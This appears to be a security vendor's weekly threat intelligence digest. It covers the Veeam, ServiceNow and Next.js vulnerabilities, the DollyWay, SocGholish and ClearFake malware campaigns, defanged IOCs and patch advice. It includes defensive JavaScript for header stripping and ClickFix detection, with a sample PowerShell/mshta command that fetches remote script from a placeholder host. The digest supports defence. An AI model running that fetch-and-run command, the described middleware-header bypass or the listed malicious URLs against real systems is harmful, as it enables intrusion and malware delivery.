Executive Summary - Highlights of Cyber Threat Intelligence Digest
Vulnerabilities
Veeam Patches Critical Remote Code Execution Vulnerability - On March 19, 2025, Veeam patched a critical remote code execution (RCE) vulnerability affecting its Veeam Backup & Replication versions 12.3.0.310 and all earlier version 12 builds, tracked as CVE-2025-23120. Successful exploitation could allow threat actors to conduct RCE and escalate privileges.
At the time of writing, there are no reports of this vulnerability being exploited in the wild.
Threat Actors are Increasingly Exploiting ServiceNow Flaws - On March 18, 2025, GreyNoise identified a resurgence of attackers exploiting critical vulnerabilities in ServiceNow's platform, specifically CVE-2024-4879, CVE-2024-5217, and CVE-2024-5178. These vulnerabilities, disclosed and patched in mid-2024, allow unauthenticated threat actors to execute arbitrary code and access sensitive data within the ServiceNow platform.
We recommend that impacted instances be patched immediately and that the malicious IPs detailed in the linked report be blocked.
Vercel Security Team Patches Critical Next.js Authorization Bypass Vulnerability - On March 21, 2025, Vercel Security Team patched CVE-2025-29927, a critical-severity vulnerability affecting Next.js, a React framework for building full-stack web applications. CVE-2025-29927 is an authorization bypass flaw in Next.js that arises from performing authorisation checks only in middleware (a function that inspects requests before they reach a route or API).
Exploitation allows threat actors to send requests with the x-middleware-subrequest header to bypass authorisation checks, potentially leading to unauthorised access to restricted features or data. At the time of writing, there have been no reports of this vulnerability being exploited in the wild.
We recommend that organisations promptly apply the patches for CVE-2025-29927 if Next.js is part of their technology infrastructure.
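As an added illustration of the defensive check the advisory implies (example code written for this digest, not code from Vercel or the Next.js project): a small Node.js pass that parses inbound request heads, flags any request carrying the x-middleware-subrequest header, and strips it before the request is forwarded. The header name comes from the advisory; the request format, host names and sample traffic are constructed.

```javascript
// Added example: flag and strip the x-middleware-subrequest header on inbound
// requests so no external client can use it to skip Next.js middleware checks.
// Header name is from the CVE-2025-29927 advisory; sample traffic is constructed.
const SUSPECT_HEADER = 'x-middleware-subrequest';

// Parse a raw HTTP/1.1 request head (request line plus header lines) into
// { method, path, headers }, lower-casing header names for case-insensitive lookup.
function parseRequestHead(raw) {
  const lines = raw.split(/\r?\n/).filter((l) => l.length > 0);
  const [method, path] = lines[0].split(' ');
  const headers = {};
  for (const line of lines.slice(1)) {
    const idx = line.indexOf(':');
    if (idx === -1) continue; // tolerate a malformed header line
    headers[line.slice(0, idx).trim().toLowerCase()] = line.slice(idx + 1).trim();
  }
  return { method, path, headers };
}

// Detection: browsers and API clients never send this header (Next.js sets it
// internally), so its presence on an inbound request is anomalous.
function isMiddlewareBypassAttempt(req) {
  return Object.prototype.hasOwnProperty.call(req.headers, SUSPECT_HEADER);
}

// Mitigation at the edge: drop the header before forwarding to Next.js. Returns
// a copy so the original request can still be logged as evidence.
function stripMiddlewareSubrequest(headers) {
  const cleaned = { ...headers };
  delete cleaned[SUSPECT_HEADER];
  return cleaned;
}

// Run detection and stripping over a batch of raw request heads.
function triage(rawRequests) {
  return rawRequests.map(parseRequestHead).map((req) => ({
    path: req.path,
    flagged: isMiddlewareBypassAttempt(req),
    forwardHeaders: stripMiddlewareSubrequest(req.headers),
  }));
}

// Constructed sample traffic: one normal request, one carrying the header.
const SAMPLE_REQUESTS = [
  'GET /dashboard HTTP/1.1\r\nHost: app.example\r\nCookie: session=abc\r\n',
  'GET /admin/users HTTP/1.1\r\nHost: app.example\r\nX-Middleware-Subrequest: 1\r\n',
];

console.log(triage(SAMPLE_REQUESTS).filter((r) => r.flagged).map((r) => r.path)); // [ '/admin/users' ]
```

Stripping at the proxy is a stop-gap for hosts that cannot update immediately; the fixed Next.js releases remain the actual remediation.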
Potential Threats
GoDaddy Uncovers Eight-Year Malware Campaign Compromising 20,000 WordPress Websites - On March 17, 2025, domain registrar GoDaddy reported a long-running malware campaign known as “DollyWay.” The campaign has been active since 2016 and is likely responsible for compromising more than 20,000 WordPress websites. The campaign has evolved into three major versions, employing techniques such as dynamic multi-stage script injection, persistent reinfection, cryptographic backdoors, and traffic monetisation via affiliate scam networks.
The latest version, DollyWay v3, functions primarily as a large-scale redirect operation monetised via affiliate scheme networks such as VexTrio and LosPollos. DollyWay v3 injects a multi-stage JavaScript chain into compromised WordPress sites that redirects site visitors to scam content after user interaction, such as clicking. To evade detection and increase profitability, DollyWay uses a Traffic Direction System (TDS) that filters out bots, administrators, and users without HTTP referrers.
The operation repurposes infected WordPress sites as part of its distributed Command and Control (C2) and TDS infrastructure.
SocGholish Malware Uses Compromised Websites to Deliver RansomHub Ransomware - SocGholish malware is being used to distribute RansomHub ransomware through compromised websites in an ongoing campaign, Trend Micro reported on March 14, 2025. The campaign has been active since the start of 2025.
SocGholish is a Malware-as-a-Service (MaaS) framework that uses obfuscated JavaScript loaders to evade detection and execute malicious payloads. RansomHub ransomware uses encryption algorithms and evasion techniques, such as process hollowing and API unhooking, to bypass security measures and avoid detection.
Once the environment is fully compromised, SocGholish finally deploys RansomHub ransomware, encrypting files across local and network storage and delivering a ransom note demanding payment for file recovery or decryption.
Latest ClearFake Variant Employs Fake reCAPTCHA and Cloudflare Turnstile Verifications to Deliver Lumma Stealer and Vidar Stealer - On March 18, 2025, cybersecurity firm Sekoia published a write-up detailing the latest ClearFake variant. ClearFake is a malicious JavaScript framework that targets victims through compromised WordPress websites, serving fake browser update notifications and security prompts to trick victims into executing PowerShell commands and delivering malware.
Per Sekoia, this new ClearFake version, active since December 2024, enhances social engineering tactics with fake reCAPTCHA and Cloudflare Turnstile verifications, tricking victims into executing PowerShell scripts, leading to the deployment of Lumma Stealer and Vidar Stealer.
General News
New Browser-in-the-Middle (BitM) Attack Bypasses MFA to Hijack User Sessions - A new session hijacking technique, dubbed Browser-in-the-Middle (BitM), bypasses multi-factor authentication (MFA) and exfiltrates user sessions. According to a March 17, 2025, report by Mandiant, BitM targets applications that enable initial access to privileged networks or environments via Virtual Desktop Infrastructure (VDI). This allows threat actors to deploy session-stealing infrastructure against publicly exposed systems with minimal configuration.
According to Mandiant, the BitM attack flow likely begins when threat actors trick victims into visiting and logging into phishing sites. Once victims complete MFA authentication, threat actors gain full control of their authenticated sessions and conduct malicious activities.
23andMe files for bankruptcy, putting customers’ genetic data at risk - The genetic testing company 23andMe has begun Chapter 11 bankruptcy proceedings, alarming regulators and privacy advocates who are warning customers to delete genetic information retained by the company.
The firm has been in financial distress for some time as interest in its at-home, saliva-based DNA tests has ebbed. In October 2023 it suffered a massive data breach causing major reputational damage and exposing the genetic information of more than six million people.
Much of that data ended up on the dark web, 23andMe has said. Last September, the firm agreed to pay $30 million in a class action lawsuit which consolidated dozens of other suits. “After a thorough evaluation of strategic alternatives, we have determined that a court-supervised sale process is the best path forward to maximise the value of the business,” Mark Jensen, chair of the board of directors, said in a statement. “We believe in the value of our people and our assets.”
The firm pledged not to change its policies around customer data management and access, saying buyers will have to agree to “comply with applicable law with respect to the treatment of customer data.”
Major web services go dark in Russia amid reported Cloudflare block - Russian internet users this week faced widespread outages that regulators attributed to issues with “foreign server infrastructure.” However, local experts suggested the disruptions stemmed from Russia’s blocking of Cloudflare, a U.S.-based service that helps websites stay secure, load faster, and remain accessible during cyberattacks.
According to data from several internet monitoring websites, the outages were observed Thursday across multiple Russian regions, particularly in the Urals and Siberia, affecting platforms such as TikTok, Steam, Twitch, Epic Games, Duolingo and major Russian mobile operators.
The disruption also impacted banking and government services, with users reporting difficulties accessing apps for Sberbank, Gazprombank and Alfa-Bank, as well as the Russian government’s portal. Messaging apps, including Telegram and WhatsApp, also faced interruptions.
Threat Actor Weekly Graph
Over the past 7 days, we have been tracking the following intent and opportunity changes within our Threat Actor Landscape.
Intent represents the potential targets of a group. When a group is observed attacking a different organisation or entity, their intent will increase.
Opportunity represents the various methods and technologies these groups may use. For example, if a group started using a new attack vector, such as a new kind of ransomware, their opportunity would increase.
Both intent and opportunity are scored out of 100 and together determine the group’s severity. These updates can be seen below.
Legend: ● Limited Severity | ● Basic Severity | ● Moderate Severity | ● High Severity

Threat Actor | Severity (previous → current) | Opportunity (previous → current) | Intent (previous → current)
---|---|---|---
UAC-0056 | ● High → ● High | ● 78 → ● 84 | ● 25 → ● 25
Kimsuky | ● High → ● High | ● 92 → ● 95 | ● 30 → ● 30
APT10 | ● Moderate → ● Moderate | ● 54 → ● 60 | ● 25 → ● 25
MuddyWater | ● Moderate → ● Moderate | ● 56 → ● 61 | ● 25 → ● 25
j0k3r369 | ● NEW → ● Basic | ● NEW → ● 30 | ● NEW → ● 25
Global Trends Powered by Recorded Future
Within each category, we have provided the current top five globally trending items. Each item is marked with a symbol indicating how actively it is trending.
The spikes in references are calculated over 60 days and are normalised to ensure they aren’t disproportionate when compared to bigger entities that will naturally have more baseline mentions.
▲- Spike – This indicates a large increase in reporting volume and a high diversity in the event descriptions.
▲- Rise – This indicates a small increase in reporting volume with little diversity in the descriptions.
Attackers | Trend | Methods | Trend | Vulnerabilities | Trend | Targets | Trend
---|---|---|---|---|---|---|---
Cloak Ransomware Group | ▲ | VanHelsing Ransomware | ▲ | CVE-2025-26633 | ▲ | Transportation | ▲
DieNet | ▲ | ATM Jackpotting | ▲ | CVE-2025-29927 | ▲ | Cloud Service Provider | ▲
Israel | ▲ | StilachiRAT | ▲ | CVE-2024-4577 | ▲ | Human Capital Management | ▲
Dark Storm Team | ▲ | FogDoor | ▲ | CVE-2025-1098 | ▲ | Oracle | ▲
Finn Balor | ▲ | Cloak Ransomware | ▲ | CVE-2025-1974 | ▲ | Malaysia Airports Holdings Bhd | ▲
Prominent Information Security Events
SocGholish Malware Uses Compromised Websites to Deliver RansomHub Ransomware.
Source: Insikt Group, Trend Micro | Validated Intelligence Event
IOC: IP - 194.135.104[.]175
IOC: IP - 162.252.173[.]12
IOC: Domain - academy.entrepreneurwealthhub[.]com
IOC: Domain - estate.envisionfonddulac[.]org
SocGholish malware is being used to distribute RansomHub ransomware through compromised websites in an ongoing campaign, Trend Micro reported on March 14, 2025. The campaign has been active since the start of 2025. SocGholish is a Malware-as-a-Service (MaaS) framework that uses obfuscated JavaScript loaders to evade detection and execute malicious payloads. RansomHub ransomware uses encryption algorithms and evasion techniques, such as process hollowing and API unhooking, to bypass security measures and avoid detection.
The attack chain begins when threat actors inject obfuscated JavaScript into legitimate websites. Once victims access these websites, they are redirected to fake browser update notifications that prompt them to download a malicious ZIP file containing SocGholish. Once executed, SocGholish profiles the environment, collects system information from the infected host, and transmits it to the threat actors’ command-and-control (C2) server. The C2 server responds with commands that allow SocGholish to install additional payloads, exfiltrate sensitive information, and execute malicious commands on infected systems. The infection progresses as SocGholish deploys backdoor components, providing persistent access for RansomHub ransomware operators.
Threat actors also use SocGholish to initiate credential theft and lateral movement, extracting credentials stored in browsers like Microsoft Edge and Google Chrome, dumping Windows registry hives (SAM, SECURITY, SYSTEM) from a volume shadow copy, and retrieving system information.
Once the environment is fully compromised, SocGholish deploys RansomHub ransomware, which encrypts files across local and network storage and delivers a ransom note demanding payment for file recovery or decryption.
Latest ClearFake Variant Employs Fake reCAPTCHA and Cloudflare Turnstile Verifications to Deliver Lumma Stealer and Vidar Stealer.
Source: Insikt Group, Sekoia | TTP Instance
IOC: URL - hxxps://start.cleaning-room-device[.]shop/sha589.m4a
IOC: URL - hxxps://ai.fdswgw[.]shop/one.mp4
IOC: URL - hxxps://nbhg-v.iuksdfb-f[.]shop/ajax.mp3
IOC: URL - hxxps://raw.githubusercontent[.]com/Vincent-48/html/refs/heads/master/TestLAB.exe
On March 18, 2025, cybersecurity firm Sekoia published a write-up detailing the latest ClearFake variant. ClearFake is a malicious JavaScript framework that targets victims through compromised WordPress websites, serving fake browser update notifications and security prompts to trick victims into executing PowerShell commands and delivering malware. Per Sekoia, this new ClearFake version, active since December 2024, enhances social engineering tactics with fake reCAPTCHA and Cloudflare Turnstile verifications, tricking victims into executing PowerShell scripts, leading to the deployment of Lumma Stealer and Vidar Stealer.
Based on Sekoia’s analysis, threat actors inject malicious JavaScript code into compromised WordPress websites. The JavaScript code loads dependencies, such as “pako”, “web3”, and “crypto”, and interacts with the Binance Smart Chain (BSC) using a custom Application Binary Interface (ABI) to fetch additional obfuscated JavaScript code.
Next, the second-stage JavaScript code retrieves an encrypted HTML file that contains the ClickFix lure from malicious URLs. At the time of writing, the URLs return error messages.
The second-stage JavaScript code decrypts the HTML file and embeds it into an iFrame, displaying either a fake Cloudflare Turnstile verification or a fake reCAPTCHA challenge. Once a victim interacts with the fake CAPTCHA, the script copies a ClickFix PowerShell command into their clipboard. The script fetches the PowerShell commands from remote URLs such as those above. At the time of writing, the URLs return error messages.
The fake CAPTCHA page instructs the victim to paste and execute the command in the Windows Run dialog (Win+R).
Once the victim executes the ClickFix PowerShell command, it runs “Mshta.exe” with an obfuscated script that loads a remote MSHTA script from URLs like those above. At the time of writing, the URLs return error messages. Once executed, the MSHTA script executes a heavily obfuscated JavaScript designed to retrieve a second-stage PowerShell script.
The second-stage PowerShell script downloads an encrypted binary payload from remote sources and decrypts it using AES. At the time of writing, the URL returns an error message. The decrypted payload contains the Emmenhtal Loader, which disables security defenses and installs additional malware. The Emmenhtal Loader executes Lumma Stealer, an information stealer, to extract stored browser credentials, cookies, cryptocurrency wallet data, and system information. In some cases, threat actors replace Lumma Stealer with Vidar Stealer, which follows the same data theft process. Finally, Lumma Stealer or Vidar Stealer exfiltrates stolen data to threat actor-controlled command-and-control (C2) servers.
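Detection logic for the execution chain above, as an added example written for this digest rather than Sekoia’s own code: two rules run over constructed process-creation events, one for mshta.exe loading a remote script and one for PowerShell launched from the Run dialog (hosted by explorer.exe) that invokes mshta. The event field names (image, parentImage, commandLine) and the sample events are assumptions, not any EDR’s real schema.

```javascript
// Added example: a detection pass over process-creation events for the ClickFix
// pattern described above (PowerShell pasted into Win+R, mshta.exe loading a
// remote script). The event schema and sample events are constructed.
const URL_RE = /https?:\/\/[^\s"']+/i;

// Lower-cased file name of an image path, tolerating either slash style.
function baseName(imagePath) {
  return imagePath.split(/[\\/]/).pop().toLowerCase();
}

// Rule 1: mshta.exe handed a remote URL, i.e. an MSHTA script fetched from the web.
function mshtaFetchesRemoteScript(ev) {
  return baseName(ev.image) === 'mshta.exe' && URL_RE.test(ev.commandLine);
}

// Rule 2: powershell.exe started from explorer.exe (which hosts the Run dialog)
// with a command line that invokes mshta, as a pasted ClickFix command does.
function powershellFromRunDialogLaunchesMshta(ev) {
  return baseName(ev.image) === 'powershell.exe'
    && baseName(ev.parentImage) === 'explorer.exe'
    && /mshta/i.test(ev.commandLine);
}

const RULES = [
  ['clickfix.mshta_remote_script', mshtaFetchesRemoteScript],
  ['clickfix.powershell_run_dialog_mshta', powershellFromRunDialogLaunchesMshta],
];

// Evaluate every rule against every event; one alert per (event, rule) match.
function detect(events) {
  const alerts = [];
  for (const ev of events) {
    for (const [rule, matches] of RULES) {
      if (matches(ev)) alerts.push({ rule, pid: ev.pid, commandLine: ev.commandLine });
    }
  }
  return alerts;
}

// Constructed sample events; URLs are placeholders, not real infrastructure.
const PS = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe';
const SAMPLE_EVENTS = [
  { pid: 101, image: 'C:\\Windows\\explorer.exe', parentImage: 'C:\\Windows\\System32\\userinit.exe', commandLine: 'explorer.exe' },
  { pid: 202, image: PS, parentImage: 'C:\\Windows\\explorer.exe', commandLine: 'powershell -c "mshta https://PLACEHOLDER.invalid/x.mp4"' },
  { pid: 303, image: 'C:\\Windows\\System32\\mshta.exe', parentImage: PS, commandLine: 'mshta https://PLACEHOLDER.invalid/x.mp4' },
  { pid: 404, image: 'C:\\Windows\\System32\\mshta.exe', parentImage: 'C:\\Windows\\explorer.exe', commandLine: 'mshta C:\\ProgramData\\vendor\\setup.hta' },
];

console.log(detect(SAMPLE_EVENTS).map((a) => `${a.rule} pid=${a.pid}`)); // rule 2 on pid 202, rule 1 on pid 303
```

The fourth sample event (mshta.exe run on a local .hta) deliberately does not alert, so legitimate administrative use of mshta with a local file is not caught by rule 1.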
Remediation Actions
Following the information provided above, we recommend that the technologies mentioned be fully patched and updated. We also want to highlight and recommend applying the following patches where applicable:
- CVE-2025-23120 - Update Veeam Backup & Replication to version 12.3.1 (build 12.3.1.1139) to reduce the risk of exploitation.
- CVE-2024-4879, CVE-2024-5217, and CVE-2024-5178 - Apply the latest patches and updates for the impacted releases of ServiceNow Utah, Washington and Vancouver.
- CVE-2025-29927 - We would recommend updating Next.js to the following versions:
- 15.x → fixed in 15.2.3
- 14.x → fixed in 14.2.25
- 13.x → fixed in 13.5.9
- 12.x → fixed in 12.3.5
If you are currently an Acumen Cyber Vulnerability Management customer, we will be proactively performing related searching and hunting activities within your environment.